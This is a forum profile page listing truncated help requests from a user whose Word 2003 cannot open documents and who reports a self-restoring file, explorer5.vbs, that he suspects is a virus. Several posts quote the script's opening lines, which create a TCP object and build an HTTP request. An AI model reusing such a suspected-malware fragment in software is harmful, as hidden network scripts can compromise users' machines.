Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

  • Congratulations TouchToneTommy on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

Recent content by tom9698

  1. tom9698

    Word 2003 problem

    I tried "winword.exe/r" but it came back--file not found--check the file path. Any more ideas? Tom
  2. tom9698

    Word 2003 problem

    Is there anyonw who knows how to repair Word--and--My Documents so I can open the many files I have there? Tom
  3. tom9698

    Word 2003 problem

    forgot--I sometimes get a "a dialog box is open" message when I click on some old documents Tom
  4. tom9698

    Word 2003 problem

    I found and moved the TbRun9.dot file (which is a Text Bridge Pro 9.0 template)--moving it did no good. Word will not open any documents--and my old documents are in My Document but I can't open them--I ran debug and repair, upgraded to office 2003 but same story. I keep getting "document not...
  5. tom9698

    Word 2003 problem

    When I open Word 2003, I get the following message: "Word cannot open this document template c:\document and settings\...\TbRun9.dot" and, I cannot open any existing My Documents doc, rtf documents in Word--I keep getting "document not available"essage. I am a theatre critic and I run...
  6. tom9698

    script host syntax error

    I tried to delete the exploere 5.vbs file but it came back tom
  7. tom9698

    script host syntax error

    it started on the 29th of June--I think it is a virus because when I deleted it--it came back here is what it looks like: On Error Resume Next set wsTCP=CreateObject("oswinsck.TCP") Head = "GET " & "http://www.nymex.com" & " HTTP/1.0" & vbCrLf & "Accept: */*" & vbCrLf & "User-Agent: " &...
  8. tom9698

    correcting a syntax error in VB script

    thanks tsuji---what and how do I do that? Tom
  9. tom9698

    correcting a syntax error in VB script

    I tried to delete this script but it comes back everytime. I then trieds to correct the error as you showed me but it came back. What can I do now?
  10. tom9698

    correcting a syntax error in VB script

    can I delete this script? What would happen if i did that? I'm desperate to be able to open my doc files in Word--I'm a theatre critic and I must deliver reviews asa What can i do now to solve this problem without getting too complicated. tom
  11. tom9698

    correcting a syntax error in VB script

    No, I just want to know what changes i need to make so the documents open and the system works like it did before. I don't know what a third party add on is and never installed one. I just want things to run noramaaly--what should I do? Tom
  12. tom9698

    correcting a syntax error in VB script

    I just wasnt Word to open documents properly and i only want my system to function normally. what changes do yourecommend? Tom9698
  13. tom9698

    syntax error 800A03EA

    I am getting an vb script error and I can't use Word, Outlook, etc.--can anyone help? Here is what Explorer 5.vbs looks like--the error message indicates line 5, char 22 On Error Resume Next set wsTCP=CreateObject("oswinsck.TCP") Head = "GET " & "http://www.nymex.com" & " HTTP/1.0" & vbCrLf &...
  14. tom9698

    correcting a syntax error in VB script

    here is what I got from explorer 5.vbs On Error Resume Next set wsTCP=CreateObject("oswinsck.TCP") Head = "GET " & "http://www.nymex.com" & " HTTP/1.0" & vbCrLf & "Accept: */*" & vbCrLf & "User-Agent: " & "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" & vbcrlf & "Host: 192.168.1.101" & vbCrLf &...
  15. tom9698

    correcting a syntax error in VB script

    When i try to either left or right click on the c:\winnt\system32\explorer5.vbs--it only shows the error message and it will not allow me to do anything. is there a way to correct this error? Tom9698

Part and Inventory Search

Back
Top